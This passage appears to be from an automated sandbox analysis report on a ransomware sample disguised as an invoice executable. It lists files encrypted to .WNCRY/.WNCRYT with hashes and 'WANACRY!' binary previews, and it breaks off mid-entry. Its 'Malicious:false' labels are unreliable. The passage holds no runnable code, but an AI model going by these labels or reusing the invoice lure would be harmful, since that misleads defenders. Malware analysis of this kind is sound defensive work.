                                                          SSDEEP:24:bkIWMqFOTOGvJDh4VfZYUEDrjmuj47I0n3usTXciuP58Y/fPTWDvrgPMtB:bkIWMyeJDh4nk+y475Ai658YXPTWQPk
                                                          MD5:4E11A9B86C1CFB9AE41888E58CFBC8D4
                                                          SHA1:8B7D5BAF14C65E00668168A4709794F16DAC2C4F
                                                          SHA-256:96EDF10C8840EB3159DE96E64B52B4F10E0A646FBC149C858381E6154D543C4F
                                                          SHA-512:68877016CA1B76D0D7037C2028A291B9FA7F9BF88089BD01E726C8C23C89A546F8513BF03B4A7A2BC25778FF150273E183688BB8932056F6881D9A9348960E6F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....An."..'.0..t[..z.N..R.^"_...,MY.^t..a..4.b.5e.t...ghQ..3.,...j.6.Jz9...W{n:.D...k...].Z.....V...N..E...'...m+.;.].F.zyQ._..y2&.t....G.^%.j.A../y;.......V.k./...5..b....:^...{......_.iH...e..k.w{....If.8../.y.t..r.Bl.N......p..K6.dZ..0.C.S..............9.S...`.h!n...r.i..<....n*...j..4!n..i..B..rW=~D?)......l.........ki-.D......A2.DR#..N.Z..9.M...T5......G.+...O#w....j........p.y..Y.D..yn+...\4..'.Km..{......"t.]=n..........O'.?.e.j..N..?.~..e@..e.l.}Y%.B..$q..'..u.B..P.!..^._...>S.0..+..n1.x.M8....=1.0...;.=.....G..."....b.t.rP..".7..E.}.f...*.S.;..)K8#.....i.......Jf...I.n.Z..2l...Td.bd?.M.....Zwi6..[...'.............]..^..xw~..Q....:.^... .R7..=._.....,;..={..?^\......0......0.e.....O.8.i.&]..w..z."O....+=3.....P}..swn.VH.o.F.....;..DA.~.W...x<~1.ji.:(;I.......-.qpG].,0...g..g.5TN.a.."s...i.r......AU1..>.|...V{../.......&./=.m..K....F.....s-..2B....<.3."~.&9*.{......YP).......^:.._3+{C.n(x..S!..'...T. sQ...F.~....

                                                          C:\Users\user\Downloads\LIJDSFKJZG.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8419130240363035
                                                          Encrypted:false
                                                          SSDEEP:24:bkQ2ub/0lTi2vLxpmCU7qq5l4Djl6UCAKL7IS64H/H62GpjToBnXAvjqhiaaIUh:bkJWAeExpmCU7qGlQ6F7l6ev62MIBOaA
                                                          MD5:806C028B3F03092667FDE7C5FBEDE241
                                                          SHA1:4BE9390B5F62D429C9123B4B763D285BDA5297AD
                                                          SHA-256:C5D6DA9805D6CCFFDC802472A6F32D60CDD36CBD8B699D6F912AA190095C4C9F
                                                          SHA-512:FC12B86C3B3586CA14DEE1A52957EE9FD5D185B3CF59611ACC8AFA0DB44B01A55AB1C97182E4B7C4D63135402DFEB6FDF17ACCA1E4535FF10A232ADD3FDC6550
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....,....Q.qB.>.J.5's..>..f....c..5"....x.I.....U...5....a9..nh...Y.z..;......3a...K..p$.~.[.... ..s[.B\0\O..`.G..9F1:.D..8.hB..q...l.9..qi....M....9m.{.b..L%D.q..W.8.iUj.&.._....*....`L.^.Rq...~.%.c.X.:..]X.Q"..../j'5.9^.,....4.1....m.N9..3y....[.h..............P...6.keU13U...P.:..8#Y...d.....Q..(.3..HB....p<!..o...'.7.._.@G.w...o`.Q.{..y.8e..<NZ=~.O.@..............<,.-..B../.}.:aq...k.......'.eG.^..7...<\.F..Ha;..|.e...$..R.......A.k.......h.!....<..%...7OL......l...q...._...p....F.B[.9........D.2;.@.,yH.....b,....0.6......1kO.?.}.39i....w.F?b..Xx:.T.{....g".95..Y.D.2.{e/+|]....BD.u..2...#.g.S... y..b..".. ^......s.......X.c.;..`"+..`..D..c._~.....7..^..xQ.9X.s.$....}..F..C.@....-.{^.%.0.....&.......'.&h0.WI.g..(.....c.a...^ {.NX).^.H...4+.S>Q(...=$%NVO.......Q7..V....V.l.).;....y.h.L&..;..._.*a.w....h...?....$BH2.UC..^.\.Z2H...S.....gQ....T...-."...`............&.e..0.........XW......r...M..vD.m...`.,w..a..z....32..^Z....VKc.b.y.-.r..~7;./

                                                          C:\Users\user\Downloads\LIJDSFKJZG.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8419130240363035
                                                          Encrypted:false
                                                          SSDEEP:24:bkQ2ub/0lTi2vLxpmCU7qq5l4Djl6UCAKL7IS64H/H62GpjToBnXAvjqhiaaIUh:bkJWAeExpmCU7qGlQ6F7l6ev62MIBOaA
                                                          MD5:806C028B3F03092667FDE7C5FBEDE241
                                                          SHA1:4BE9390B5F62D429C9123B4B763D285BDA5297AD
                                                          SHA-256:C5D6DA9805D6CCFFDC802472A6F32D60CDD36CBD8B699D6F912AA190095C4C9F
                                                          SHA-512:FC12B86C3B3586CA14DEE1A52957EE9FD5D185B3CF59611ACC8AFA0DB44B01A55AB1C97182E4B7C4D63135402DFEB6FDF17ACCA1E4535FF10A232ADD3FDC6550
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....,....Q.qB.>.J.5's..>..f....c..5"....x.I.....U...5....a9..nh...Y.z..;......3a...K..p$.~.[.... ..s[.B\0\O..`.G..9F1:.D..8.hB..q...l.9..qi....M....9m.{.b..L%D.q..W.8.iUj.&.._....*....`L.^.Rq...~.%.c.X.:..]X.Q"..../j'5.9^.,....4.1....m.N9..3y....[.h..............P...6.keU13U...P.:..8#Y...d.....Q..(.3..HB....p<!..o...'.7.._.@G.w...o`.Q.{..y.8e..<NZ=~.O.@..............<,.-..B../.}.:aq...k.......'.eG.^..7...<\.F..Ha;..|.e...$..R.......A.k.......h.!....<..%...7OL......l...q...._...p....F.B[.9........D.2;.@.,yH.....b,....0.6......1kO.?.}.39i....w.F?b..Xx:.T.{....g".95..Y.D.2.{e/+|]....BD.u..2...#.g.S... y..b..".. ^......s.......X.c.;..`"+..`..D..c._~.....7..^..xQ.9X.s.$....}..F..C.@....-.{^.%.0.....&.......'.&h0.WI.g..(.....c.a...^ {.NX).^.H...4+.S>Q(...=$%NVO.......Q7..V....V.l.).;....y.h.L&..;..._.*a.w....h...?....$BH2.UC..^.\.Z2H...S.....gQ....T...-."...`............&.e..0.........XW......r...M..vD.m...`.,w..a..z....32..^Z....VKc.b.y.-.r..~7;./

                                                          C:\Users\user\Downloads\NIRMEKAMZH.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.821325761019143
                                                          Encrypted:false
                                                          SSDEEP:24:bkARXDsVqfzbDDpkrFDQfSrgJDTE6A1Xu5cghwHldXOuukBM5bqznefA+Zmj4BAD:bkA5m+DNkrF4TEvXueDPYuafAAmUBAD
                                                          MD5:8F8F8EBC0B0ADCC731A6348ACC23CF15
                                                          SHA1:2479E037D6CEBC48465A0B0E5880B2276B3631AF
                                                          SHA-256:666203F8C6EBA71F58D721B9032C85700B4AC10A271503DDE2D1E290A0DB72C2
                                                          SHA-512:CD978A28F2E3C359C535BA5F5733F9C276122C8D662F8F3003F2AB6CC171021468B75EF53800F40C1E7CA14A0FF21CEE1A4894E8655EB9FAF928FCF9F4E2405E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....>?..V.....`./>.i..(.p...m(\..L."O.q.h.....W.K>.....L.%=ek...!....f0.. .c.........{.-...|;IL.7t.a.@.k9..\..hl..O...m.#..Y.z.~@r...l...r.<.'.....q....oQV..m....>.C..=R.c.Q.}3....iBAH..^k.......gs.R........UO1/.@h....`s...Q.;E.......P..?...(.b.n................V.2.....|....vakP.....Kao.% ...P....4R.o...az^..!B.O9...J...k.Ll......D .x8..`.M.2...X.L/ q.$.L.h......."...LMw..{....<.......S}./..p...~.8]....tX."O......`.J.....!.o..?.3....N.o*..!s.B32E.."O.Em.I(+..b..J..%.uo..xn..[...B.>+.fTat..c..;...e.V;Fxb.]....Z.}.l..'..Y$W..w.B.}.P.k6\...W.... qq..NA}.l.CSE30.:..#./!cW.$.a..o;.x.;.H.....dE._Z...!.q...Uq..V.o;...*..o."..bQ6O".V_...r....*#.!.(......\...M.H.."~*fQ.9.@.T}.t...D,.^..>.......}.......}r2C..5........u....r"z.$;.>xt.C.%zr.SX#<P.m.:...@....].R..VO2}UK......,*.A...&.t....<...v1e./<.!f.`R.....v..a.%..?.k..$Um...y46nHT.Y.;...V.Q.N.~*.....F=>V..vP...../%...L..@..I.V.I2C.uv..I...7....K1..k...../]bC..8.J.M..h.r.].].....n.4.q-w>7.[.`

                                                          C:\Users\user\Downloads\NIRMEKAMZH.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.821325761019143
                                                          Encrypted:false
                                                          SSDEEP:24:bkARXDsVqfzbDDpkrFDQfSrgJDTE6A1Xu5cghwHldXOuukBM5bqznefA+Zmj4BAD:bkA5m+DNkrF4TEvXueDPYuafAAmUBAD
                                                          MD5:8F8F8EBC0B0ADCC731A6348ACC23CF15
                                                          SHA1:2479E037D6CEBC48465A0B0E5880B2276B3631AF
                                                          SHA-256:666203F8C6EBA71F58D721B9032C85700B4AC10A271503DDE2D1E290A0DB72C2
                                                          SHA-512:CD978A28F2E3C359C535BA5F5733F9C276122C8D662F8F3003F2AB6CC171021468B75EF53800F40C1E7CA14A0FF21CEE1A4894E8655EB9FAF928FCF9F4E2405E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....>?..V.....`./>.i..(.p...m(\..L."O.q.h.....W.K>.....L.%=ek...!....f0.. .c.........{.-...|;IL.7t.a.@.k9..\..hl..O...m.#..Y.z.~@r...l...r.<.'.....q....oQV..m....>.C..=R.c.Q.}3....iBAH..^k.......gs.R........UO1/.@h....`s...Q.;E.......P..?...(.b.n................V.2.....|....vakP.....Kao.% ...P....4R.o...az^..!B.O9...J...k.Ll......D .x8..`.M.2...X.L/ q.$.L.h......."...LMw..{....<.......S}./..p...~.8]....tX."O......`.J.....!.o..?.3....N.o*..!s.B32E.."O.Em.I(+..b..J..%.uo..xn..[...B.>+.fTat..c..;...e.V;Fxb.]....Z.}.l..'..Y$W..w.B.}.P.k6\...W.... qq..NA}.l.CSE30.:..#./!cW.$.a..o;.x.;.H.....dE._Z...!.q...Uq..V.o;...*..o."..bQ6O".V_...r....*#.!.(......\...M.H.."~*fQ.9.@.T}.t...D,.^..>.......}.......}r2C..5........u....r"z.$;.>xt.C.%zr.SX#<P.m.:...@....].R..VO2}UK......,*.A...&.t....<...v1e./<.!f.`R.....v..a.%..?.k..$Um...y46nHT.Y.;...V.Q.N.~*.....F=>V..vP...../%...L..@..I.V.I2C.uv..I...7....K1..k...../]bC..8.J.M..h.r.].].....n.4.q-w>7.[.`

                                                          C:\Users\user\Downloads\QFAPOWPAFG.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844424890604193
                                                          Encrypted:false
                                                          SSDEEP:24:bkoTdTlnZvI8vKW9Gk5q87hx+Fs5Ij/KZIkw/Tq:bkQJ1I+KW9Geq876GIjSZZwbq
                                                          MD5:2FDFAE9BCAB03556176F8A8AC3BDD99E
                                                          SHA1:E894283D1BF6E12E01EE54499EDFAC1C8A5F7224
                                                          SHA-256:7828F845A8F25E07070E5E48EB08BDC0280E31F7446B594707A5122B347A770F
                                                          SHA-512:B2FD59D1F2D5720E1048E0853213565DE2DECBD4CED6F2814C1410ABDD4EA9B8BA1A6554AC23A58AD80A6033B247FDB1C4A120FFDBA02B1CA7C7E3CE53603889
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M@......6a..}..:Ur<Y.ls_...9/.j..U.~....)`d..`....D9.KTLb0c.....W.D.....Y..&/...7...{.{.tO.].v."C...l*.A.R|&...z..6..K.J.'x+...~...y..z'...x-S..'1.+KR....$.OF.:Zn.*.......I.....B....V...."B...M....q.......w.!.....U.j8....c.....J..5.U.....X.D............|L.1[.v....@e.w...F........g....G...<......i...a.O.....Jr).%.`..o....m...........>.........y5..Mqc.Y.j..ObR..$.t..(.{S8.%B.n.f.$ff...g.*d.`i..[.5...xO.6..2.U.et.A.&..].5..q.....Z....$.2z.M~..e..v..e..:.aD..Q..i.K.q.~G.'Bt.....p{1w.....`..K..h..a.W.c:...0i.O.1x".@,.8..K.]..q..e...Cp"AU@..'b.kY...M..S.P..K..Gv.......'7..Yd......,..c.....c9J,...U...Z0m....GN..h:v.D.y...L...........>...P.T)>GH..0N2&.^|.!p........m...7uZ...E...:.....{ .Qn.....a"..w5@V...%.8.q.....}Yk.]^..9..b...:..i)....g...j............O.?z..ms..S..|..Rj>;.+N..]...$..T.../...^AG..........T.....&../.Y......kG.RPtX....t.+?.p..&4...u?.-S...I'..H7.......&j.x*.v.=.il...E..[..^....9...C.M9T..^r..-.;.o.lo,1.H...y2.....|..

                                                          C:\Users\user\Downloads\QFAPOWPAFG.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844424890604193
                                                          Encrypted:false
                                                          SSDEEP:24:bkoTdTlnZvI8vKW9Gk5q87hx+Fs5Ij/KZIkw/Tq:bkQJ1I+KW9Geq876GIjSZZwbq
                                                          MD5:2FDFAE9BCAB03556176F8A8AC3BDD99E
                                                          SHA1:E894283D1BF6E12E01EE54499EDFAC1C8A5F7224
                                                          SHA-256:7828F845A8F25E07070E5E48EB08BDC0280E31F7446B594707A5122B347A770F
                                                          SHA-512:B2FD59D1F2D5720E1048E0853213565DE2DECBD4CED6F2814C1410ABDD4EA9B8BA1A6554AC23A58AD80A6033B247FDB1C4A120FFDBA02B1CA7C7E3CE53603889
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M@......6a..}..:Ur<Y.ls_...9/.j..U.~....)`d..`....D9.KTLb0c.....W.D.....Y..&/...7...{.{.tO.].v."C...l*.A.R|&...z..6..K.J.'x+...~...y..z'...x-S..'1.+KR....$.OF.:Zn.*.......I.....B....V...."B...M....q.......w.!.....U.j8....c.....J..5.U.....X.D............|L.1[.v....@e.w...F........g....G...<......i...a.O.....Jr).%.`..o....m...........>.........y5..Mqc.Y.j..ObR..$.t..(.{S8.%B.n.f.$ff...g.*d.`i..[.5...xO.6..2.U.et.A.&..].5..q.....Z....$.2z.M~..e..v..e..:.aD..Q..i.K.q.~G.'Bt.....p{1w.....`..K..h..a.W.c:...0i.O.1x".@,.8..K.]..q..e...Cp"AU@..'b.kY...M..S.P..K..Gv.......'7..Yd......,..c.....c9J,...U...Z0m....GN..h:v.D.y...L...........>...P.T)>GH..0N2&.^|.!p........m...7uZ...E...:.....{ .Qn.....a"..w5@V...%.8.q.....}Yk.]^..9..b...:..i)....g...j............O.?z..ms..S..|..Rj>;.+N..]...$..T.../...^AG..........T.....&../.Y......kG.RPtX....t.+?.p..&4...u?.-S...I'..H7.......&j.x*.v.=.il...E..[..^....9...C.M9T..^r..-.;.o.lo,1.H...y2.....|..

                                                          C:\Users\user\Downloads\QFAPOWPAFG.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.851984951275298
                                                          Encrypted:false
                                                          SSDEEP:24:bkfaenHucELCMVs4XNiYNsu7wTZok6fcegeObvoHDDnBUTSHgcycBg+khw6au5d:bkfaeHvsdvNspOk6fce3kojDB39Rz6ac
                                                          MD5:D1BA2213569ACDBC009971DD2BE961E0
                                                          SHA1:7435D826E34DAEFB28FCF065347F6D6A42C9EF67
                                                          SHA-256:A623B6F2CF0BDF4A55ECD330271F8FFE774C207F3B0855F22B473814E99E3977
                                                          SHA-512:E72BD30FA8484A72BCC9A3E7D585C0CA8D7974DFC38F261A8C7046170C81CF334F50EF2B0CB5D4B07484128FAC67E7114E20F86A992BF40DE14319DADCDB80E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........x.9|p...x.1..[Q?..C..)z...<..]..Ig#r.?.C.xk....Y.y..($w4..._gUvu.wz.U...Y\..z...plp"K..>.N.....|xM.S.-.*..gS....q...Y.\(+/...3......=...4......1a1D..^1.E.aU...X.....v...r.;.......@u..0.m.>6X...1.l..<^C2..V...x.D.O.%.`........7G......8............r(.Iq..r.j>.N.7...n2..L._.(."...i......?.*......F..m.<jS.e.p..3!...h.I....4..Rt...H:.L....a.DS....=l]..(.}.j.6/"..9....JUX.9\.....=......{,.R;.6.|xq&....2.......|g......t= ;.I...g................2.BV...^..k....b.....`..`]........7.b./E7JK.Y5...~...C:..<..x.9"`.~....=..UMC.&pR..3K.&..g...Ka....I.R....mj...P...............D3$j.e..v.E...u..5a.....v-...W.z........d5..e.......$..l.~.AE..4Oga.'...C.f^.q..7..Go.O.`...8^.be.< ..C...lE'....V... )..|j.......6..Y/...D1.G;.{..w...u....(Lj p.b:..!4.<.n.........&%d.....>...f.Q..$.'.k.....|oO..;...MO.......i...4..Z...U6.G./..G....:..._..M...x.Ed.........MZ........2....#Y.F.....8w..j.:7..:.Z..?.P^.......<./..d.x..(<.})......u...b2

                                                          C:\Users\user\Downloads\QFAPOWPAFG.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.851984951275298
                                                          Encrypted:false
                                                          SSDEEP:24:bkfaenHucELCMVs4XNiYNsu7wTZok6fcegeObvoHDDnBUTSHgcycBg+khw6au5d:bkfaeHvsdvNspOk6fce3kojDB39Rz6ac
                                                          MD5:D1BA2213569ACDBC009971DD2BE961E0
                                                          SHA1:7435D826E34DAEFB28FCF065347F6D6A42C9EF67
                                                          SHA-256:A623B6F2CF0BDF4A55ECD330271F8FFE774C207F3B0855F22B473814E99E3977
                                                          SHA-512:E72BD30FA8484A72BCC9A3E7D585C0CA8D7974DFC38F261A8C7046170C81CF334F50EF2B0CB5D4B07484128FAC67E7114E20F86A992BF40DE14319DADCDB80E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........x.9|p...x.1..[Q?..C..)z...<..]..Ig#r.?.C.xk....Y.y..($w4..._gUvu.wz.U...Y\..z...plp"K..>.N.....|xM.S.-.*..gS....q...Y.\(+/...3......=...4......1a1D..^1.E.aU...X.....v...r.;.......@u..0.m.>6X...1.l..<^C2..V...x.D.O.%.`........7G......8............r(.Iq..r.j>.N.7...n2..L._.(."...i......?.*......F..m.<jS.e.p..3!...h.I....4..Rt...H:.L....a.DS....=l]..(.}.j.6/"..9....JUX.9\.....=......{,.R;.6.|xq&....2.......|g......t= ;.I...g................2.BV...^..k....b.....`..`]........7.b./E7JK.Y5...~...C:..<..x.9"`.~....=..UMC.&pR..3K.&..g...Ka....I.R....mj...P...............D3$j.e..v.E...u..5a.....v-...W.z........d5..e.......$..l.~.AE..4Oga.'...C.f^.q..7..Go.O.`...8^.be.< ..C...lE'....V... )..|j.......6..Y/...D1.G;.{..w...u....(Lj p.b:..!4.<.n.........&%d.....>...f.Q..$.'.k.....|oO..;...MO.......i...4..Z...U6.G./..G....:..._..M...x.Ed.........MZ........2....#Y.F.....8w..j.:7..:.Z..?.P^.......<./..d.x..(<.})......u...b2

                                                          C:\Users\user\Downloads\VWDFPKGDUF.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8393141280330125
                                                          Encrypted:false
                                                          SSDEEP:24:bkIKpMbqOffnB2uRP2wWmNJlMiFCCzAgRgZdHF54tTtjBJNd62R29i0un:bkI4MWO3BzeEVF9lgzFCTtVJBR2c0un
                                                          MD5:58A20BEF24C23E80E38F3009814428A7
                                                          SHA1:A302CC8C7CB9BA819CA23094B34E1B89B666620B
                                                          SHA-256:6C7C6FA17DC7C8A5EF142AE1F3539624620D12EB2752C78A0E88CA5EABC1C844
                                                          SHA-512:B556039424323C88ABAC07226517F5EB5A2C1EAFE74E51A716C69C1BC861090FB7915220CE3B5326657328D17081B43E9124B14773B8AAECFE4356B0D9315D2C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N.TXv!1..h`.Z.J../....V....b..(m.<S..SME.#........A......O...!...$.-..^.....?.@..%..G|.kD..]?o..9.$.CZ&w.Wg.......y.X.%.<.+.qG..w..@=MHH.4:.4#.......n....J+.F.u.F..~.n.....6}[}2.d..:..D.E..1:...1...s.r.....C.p....HK..........C.s.RC..1!`O..................^..p...&..`.......".m8.\.....g......9E..'k.....Hr...gjn.c.:.....h.._z.B..........{Z.? w.[..z.._......k..z.....\=z..BVu.96.....B...zN.uOt.....J.?.t;.x>z.0,...h.....#H. <.d.........C..F.Ni.....V..'rB^..#..n.t.S....3Q>...s.........z[.D.......ut3.la......g.n....O.f..y...!1.2.......f.....:...?........s![.q*..ZQ.'.1..v5.f..g.4z.g..PlA....u.~..U.V...V.)....}H.4t..@.-.a...#Z-..-8.G.\p.7.....O..IXp..~E.{...:.n.9P.d....~..cJJkwq^W.............?.P....;.q.r#.H.m.n.&...h.=yr}./....<ws.U...i.[.N.......SRpQ......s.`..}]P....S......]d.7.t..q........9.{.'.....N.b.zz.".....\..#.._w.BT........4....}.0v~2.:..~.b...H.S..2..;..='.;V..qy.Qr'./..p-.......t...@I\...M.7.c.._.`d...OF......gO.X..

                                                          C:\Users\user\Downloads\VWDFPKGDUF.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8393141280330125
                                                          Encrypted:false
                                                          SSDEEP:24:bkIKpMbqOffnB2uRP2wWmNJlMiFCCzAgRgZdHF54tTtjBJNd62R29i0un:bkI4MWO3BzeEVF9lgzFCTtVJBR2c0un
                                                          MD5:58A20BEF24C23E80E38F3009814428A7
                                                          SHA1:A302CC8C7CB9BA819CA23094B34E1B89B666620B
                                                          SHA-256:6C7C6FA17DC7C8A5EF142AE1F3539624620D12EB2752C78A0E88CA5EABC1C844
                                                          SHA-512:B556039424323C88ABAC07226517F5EB5A2C1EAFE74E51A716C69C1BC861090FB7915220CE3B5326657328D17081B43E9124B14773B8AAECFE4356B0D9315D2C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N.TXv!1..h`.Z.J../....V....b..(m.<S..SME.#........A......O...!...$.-..^.....?.@..%..G|.kD..]?o..9.$.CZ&w.Wg.......y.X.%.<.+.qG..w..@=MHH.4:.4#.......n....J+.F.u.F..~.n.....6}[}2.d..:..D.E..1:...1...s.r.....C.p....HK..........C.s.RC..1!`O..................^..p...&..`.......".m8.\.....g......9E..'k.....Hr...gjn.c.:.....h.._z.B..........{Z.? w.[..z.._......k..z.....\=z..BVu.96.....B...zN.uOt.....J.?.t;.x>z.0,...h.....#H. <.d.........C..F.Ni.....V..'rB^..#..n.t.S....3Q>...s.........z[.D.......ut3.la......g.n....O.f..y...!1.2.......f.....:...?........s![.q*..ZQ.'.1..v5.f..g.4z.g..PlA....u.~..U.V...V.)....}H.4t..@.-.a...#Z-..-8.G.\p.7.....O..IXp..~E.{...:.n.9P.d....~..cJJkwq^W.............?.P....;.q.r#.H.m.n.&...h.=yr}./....<ws.U...i.[.N.......SRpQ......s.`..}]P....S......]d.7.t..q........9.{.'.....N.b.zz.".....\..#.._w.BT........4....}.0v~2.:..~.b...H.S..2..;..='.;V..qy.Qr'./..p-.......t...@I\...M.7.c.._.`d...OF......gO.X..

                                                          C:\Users\user\Downloads\VWDFPKGDUF.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.853794139678357
                                                          Encrypted:false
                                                          SSDEEP:24:bk40XWvby2kqL5X7iIjjfG9dHKjF6czbt9a4zzv0AuTXu/31f3AD8ScxkyRAVL+:bk4oebplrrursF6shxzzNgX6x3AA3xhl
                                                          MD5:556133CCDEC3A0B9EA801E84F5ABA51D
                                                          SHA1:2C973AFE22AB1AF16E27240932DCEDE887E4AEA7
                                                          SHA-256:927D706EB4E956ADEF075E953B289A13CE89BB4EFF12E72CCE10C94F50A1DF2F
                                                          SHA-512:F90FD7DE13C2CF184A4DBEAB768081A23172DD6B6257796465454BC7C66844552C26D80FB61FA9554A5BE1EA31939530047DFD6085D34321B97316836D4ACD92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....)..R......%..<.7.(GUp....;...HP.5O(........1...:>%.+..;a....V.s.L....j..i..B.eu&...nh..t.Yk..../X.............H.....A]x..P..MLo.,$.sA.."P...j+.L.....I.y.$..U/....A.*I.$...#..3ON....s.X....(.......a%.o;j.._#&*.......xJ.....4.B....C.I..>..............{.}.....".!C.. S._.OZ..)..W....Un/6...-.......5G..@.H(....KF..T..(e...@.dr......^Q.....W .......?...].0`2F^9g.P..A.d....Pc.w*.7.T...m.7.H.h...J)..f.....u..a....D.]..lW.y...-..H....].`......2.v(....:.yJ&..W.4u;&...HR...%6F...#.$...v.[..[..RPNR.HK....&/.N.....".>..Zj..ka{..9D..4..b.K......~.x...T.F.b4....uU..x...B..aF.#.&.....".}3.=ot.|.B.....6L..@cm/;..Q.v[GE...(....m...:.}a.C...]s..-.....@*.o...?....fW.l.[.5...pRW...m..(')....EY..M......._4.a#...+...Qh....$m...Hp.e..A....R'...'.S9R...K..\:i..a.!g.}0...}....F..t:...6.G..&..=@.....\.........r....h...'j..`.SU.l._..L&...#.m...R.+r.P...2..\....d..}.'}..}........4.b.B0.Z......g..gE..Q|.w...j.C.g..`...m..h....5Fev..T.k.....+".....l.b..

                                                          C:\Users\user\Downloads\VWDFPKGDUF.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.853794139678357
                                                          Encrypted:false
                                                          SSDEEP:24:bk40XWvby2kqL5X7iIjjfG9dHKjF6czbt9a4zzv0AuTXu/31f3AD8ScxkyRAVL+:bk4oebplrrursF6shxzzNgX6x3AA3xhl
                                                          MD5:556133CCDEC3A0B9EA801E84F5ABA51D
                                                          SHA1:2C973AFE22AB1AF16E27240932DCEDE887E4AEA7
                                                          SHA-256:927D706EB4E956ADEF075E953B289A13CE89BB4EFF12E72CCE10C94F50A1DF2F
                                                          SHA-512:F90FD7DE13C2CF184A4DBEAB768081A23172DD6B6257796465454BC7C66844552C26D80FB61FA9554A5BE1EA31939530047DFD6085D34321B97316836D4ACD92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....)..R......%..<.7.(GUp....;...HP.5O(........1...:>%.+..;a....V.s.L....j..i..B.eu&...nh..t.Yk..../X.............H.....A]x..P..MLo.,$.sA.."P...j+.L.....I.y.$..U/....A.*I.$...#..3ON....s.X....(.......a%.o;j.._#&*.......xJ.....4.B....C.I..>..............{.}.....".!C.. S._.OZ..)..W....Un/6...-.......5G..@.H(....KF..T..(e...@.dr......^Q.....W .......?...].0`2F^9g.P..A.d....Pc.w*.7.T...m.7.H.h...J)..f.....u..a....D.]..lW.y...-..H....].`......2.v(....:.yJ&..W.4u;&...HR...%6F...#.$...v.[..[..RPNR.HK....&/.N.....".>..Zj..ka{..9D..4..b.K......~.x...T.F.b4....uU..x...B..aF.#.&.....".}3.=ot.|.B.....6L..@cm/;..Q.v[GE...(....m...:.}a.C...]s..-.....@*.o...?....fW.l.[.5...pRW...m..(')....EY..M......._4.a#...+...Qh....$m...Hp.e..A....R'...'.S9R...K..\:i..a.!g.}0...}....F..t:...6.G..&..=@.....\.........r....h...'j..`.SU.l._..L&...#.m...R.+r.P...2..\....d..}.'}..}........4.b.B0.Z......g..gE..Q|.w...j.C.g..`...m..h....5Fev..T.k.....+".....l.b..

                                                          C:\Users\user\Downloads\WSHEJMDVQC.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834077587763993
                                                          Encrypted:false
                                                          SSDEEP:24:bkf+zD3RoCmO4K2g4a02X93j6+rUZJ00L/lxD8B+FaX4PlopN7269Sj:bkiTRoCmJBablj6+r+F/l18BjPpN7Bkj
                                                          MD5:C22FDB40A47E41B5B1F21C0C05DA97CE
